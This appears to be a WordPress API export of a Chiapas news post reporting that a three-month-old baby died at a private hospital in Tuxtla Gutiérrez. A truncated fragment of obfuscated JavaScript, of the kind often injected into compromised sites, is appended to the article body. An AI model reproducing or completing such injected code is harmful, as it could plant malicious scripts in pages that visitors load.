{"id":23059,"date":"2025-07-19T06:42:42","date_gmt":"2025-07-19T06:42:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23059"},"modified":"2025-07-19T06:42:43","modified_gmt":"2025-07-19T06:42:43","slug":"bebe-pierde-la-vid4-en-hospital-particular","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23059","title":{"rendered":"Beb\u00e9 pierde la vid4 en hospital particular"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23061\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230091-1024x576.jpg\" alt=\"\" class=\"wp-image-23061\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230091-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230091-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230091-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230091-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230091-2048x1152.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"23062\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230081-1024x576.jpg\" alt=\"\" class=\"wp-image-23062\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230081-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230081-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230081-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230081-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230081-2048x1152.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>18 de julio del 2025. Tuxtla Guti\u00e9rrez.- Este viernes cerca del mediod\u00eda se report\u00f3 que un beb\u00e9 perdi\u00f3 la vid4 en un nosocomio particular ubicado en el Fraccionamiento Rinconada del Sol.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de una unidad solicit\u00f3 el apoyo en el puesto de control C2 en el tramo San Fernando-Tuxtla Guti\u00e9rrez ya que transportaba en un VW Jetta a una madre con su Beb\u00e9 de tres meses el cual presentaba problemas para respirar.<\/p>\n\n\n\n<p>Detallaron que eran procedentes de Copainal\u00e1 y fueron llevados al nosocomio Arbolab ubicado en la 16 Poniente y Tercera Norte.<\/p>\n\n\n\n<p>Lamentablemente el personal m\u00e9dico ya nada pudo hacer ya que el Beb\u00e9 ya no contaba con signos vitales.<\/p>\n\n\n\n<p>Al lugar acudieron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. 18 de julio del 2025. Tuxtla Guti\u00e9rrez.- Este viernes cerca del mediod\u00eda se report\u00f3 que un beb\u00e9 perdi\u00f3 la vid4 en un nosocomio particular ubicado en el Fraccionamiento Rinconada del Sol. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de una unidad solicit\u00f3 el apoyo en el puesto de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23062,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-23059","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23059","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23059"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23059\/revisions"}],"predecessor-version":[{"id":23063,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23059\/revisions\/23063"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23062"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23059"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23059"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23059"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}